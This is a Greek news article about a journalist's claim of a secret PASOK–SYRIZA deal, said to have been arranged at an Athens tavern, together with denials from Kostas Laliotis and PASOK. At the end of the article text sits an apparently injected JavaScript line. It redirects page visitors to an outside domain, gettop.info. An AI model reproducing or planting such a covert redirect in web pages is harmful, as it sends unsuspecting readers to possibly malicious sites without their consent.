Παπαχρήστος: «Μυστικός αρραβώνας» ΠΑΣΟΚ-Σύριζα… Σκληρή απάντηση Φώφης

0
28

 

Ο δημοσιογράφος Γιώργος Παπαχρήστος γράφει σήμερα στα Νέα ότι υπάρχει «πολιτικός αρραβώνας» ΠΑΣΟΚ – Σύριζα (που περιελάμβανε και τη στήριξη της κυβέρνησης για τη συγκρότηση του ΕΣΡ) και ότι μεσολάβησαν γι αυτόν ο Κώστας Λαλιώτης και ο υπουργός Υποδομών Χρήστος Σπίρτζης. Προσθέτει δε ότι η συμφωνία έκλεισε σε γεύμα των δυο, σε γνωστή ταβέρνα της Αθήνας.

Την πληροφορία διέψευσε τόσο το ΠΑΣΟΚ όσο και ο Κώστας Λαλιώτης. Μάλιστα, Η Φώφη Γεννηματά, στην οργισμένη ανακοίνωση της Χαριλάου Τρικούπη κατηγορεί τον δημοσιογράφο ότι έγραψε το κείμενο «καθ΄ υπαγόρευση τόσο των νέων αφεντικών του, όσο και πολιτικών προσώπων που ξεβολεύονται», χωρίς πάντως να κατονομάζονται τα «αφεντικά» και τα «πολιτικά πρόσωπα».

Από την πλευρά του ο Κώστας Λαλιώτης υπογραμμίζει ότι απλώς συνέπεσε, ένα μεσημέρι, να γευματίζει με την παρέα του στην ίδια ταβέρνα, στην οποία έτρωγε και ο κ. Σπίρτζης με τη δική του συντροφιά. Αντάλλαξαν, λοιπόν, δυο κουβέντες σε δημόσια θέα. Τονίζει δε ότι δική του θέση ήταν και παραμένει πως το ΠΑΣΟΚ πρέπει να χτίσει τον δικό του αυτόνομο πολιτικό πόλο, οριοθετημένο σαφώς τόσο από τον Σύριζα όσο και από τη ΝΔ. Προσκαλεί δε τον Γιώργο Παπαχρήστο για φαγητό στην ίδια ταβέρνα, με τη γνωστή και σε εκείνον παρέα.

Aναλυτικότερα, σύμφωνα με δήλωση του Κ.Λαλιώτη: «το μόνο γεγονός είναι ότι ένα μεσημέρι, έτυχε να συνυπάρχουμε σε ένα εστιατόριο ο Χρήστος Σπίρτζης με την παρέα του και εγώ με την παρέα μου. Εκτός από μια σύντομη φιλοφρόνηση σε ανοιχτό χώρο και με την παρουσία άλλων προσώπων, δεν υπήρξε καμιά ουσιαστική συζήτηση, κανένα παρασκήνιο και πολύ περισσότερο κανένα ‘προξενιό’ και κανένας ‘αρραβώνας’».

Προσθέτει, δε, ότι: «Οι θέσεις μου είναι διαχρονικά γνωστές, διαφανείς και σαφέστατες. Η κατοχύρωση και ανάδειξη του ΠΑΣΟΚ, της Δημοκρατικής Συμπαράταξης, και της Κεντροαριστεράς ως Δημοκρατικού και Προοδευτικού Πόλου συνδέεται άρρηκτα και αδιαπραγμάτευτα με τον αυτόνομο λόγο του, την αυτοδύναμη στρατηγική του και τον καταλυτικό ρόλο του.

Αυτό προϋποθέτει, οριστικά και αμετάκλητα, σαφείς ιδεολογικές και πολιτικές οριοθετήσεις και προγραμματικές θέσεις και αντιπαραθέσεις, τόσο με τον ΣΥΡΙΖΑ όσο και με τη ΝΔ. Πιστεύω, ότι μόνο με αυτή τη στρατηγική και με αυτόν τον πολιτικό σχεδιασμό το ΠΑΣΟΚ, η Δημοκρατική Συμπαράταξη και η Κεντροαριστερά δεν θα μετατρέπονται σε δεκανίκι και ουρά είτε του ΣΥΡΙΖΑ, είτε της ΝΔ και θα μπορούν να έχουν δυναμική, προοπτική και ευοίωνο μέλλον».

Καταλήγει στη δήλωσή του με ένα υστερόγραφο προς τον δημοσιογράφο Γ. Παπαχρήστο που υπογράφει το σχετικό δημοσίευμα: «Φίλε Γιώργο, σε προσκαλώ ένα μεσημέρι, για φαγητό, στη γνωστή ταβέρνα με τη γνωστή σε σένα σύνθεση. Τυχαία, μπορείς να συναντήσεις και άλλες παρέες που κατά σύμπτωση μπορεί να είναι βουλευτές και υπουργοί από όλες τις παρατάξεις, δημοσιογράφοι από όλα τα μέσα ενημέρωσης, διανοούμενοι και καλλιτέχνες. Έτσι θα καταλάβεις για μια ακόμη φορά, ότι στη γνωστή και φιλόξενη ταβέρνα όλα είναι ανοιχτά και διάφανα και δεν υπάρχουν ‘παρασκήνια’, ‘προξενιά’, ‘αρραβώνες’ και ‘γάμοι’».

Η ανακοίνωση του ΠΑΣΟΚ:

«Γνωρίζουμε και γνωρίζουν όλοι, ότι η στρατηγική επιλογή μας για αυτόνομη πορεία του ΠΑΣΟΚ και διακριτό ρόλο από τον ΣΥΡΙΖΑ και τη ΝΔ, έχει ενοχλήσει συγκεκριμένα συμφέροντα και τους πολιτικούς εντολοδόχους τους. Κατανοούμε επομένως ότι το σημερινό απολύτως ψευδές και καταφανώς ανυπόστατο δημοσίευμα στο «στίγμα» γνωστού δημοσιογράφου, έρχεται καθ΄ υπαγόρευση τόσο των νέων αφεντικών του, όσο και των πολιτικών προσώπων και κύκλων που ξεβολεύονται με την κεντρική θέση μας και αντιπαρατίθενται ανοιχτά», αναφέρεται στην ανακοίνωση του ΠΑΣΟΚ, όπου επαναλαμβάνεται ότι η Δημοκρατική Συπαράταξη δικαιώθηκε απόλυτα στο θέμα των τηλεοπτικών αδειών, όπου η στάση της ανάγκασε «τον μεν ΣΥΡΙΖΑ να αποσύρει όλες τις αντισυνταγματικές και καθεστωτικές διατάξεις του νόμου Παππά, τη δε Νέα Δημοκρατία να αποδεχθεί συρόμενη τη θέση μας και να συμβάλλει στη συγκρότηση της ανεξάρτητης αρχής». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here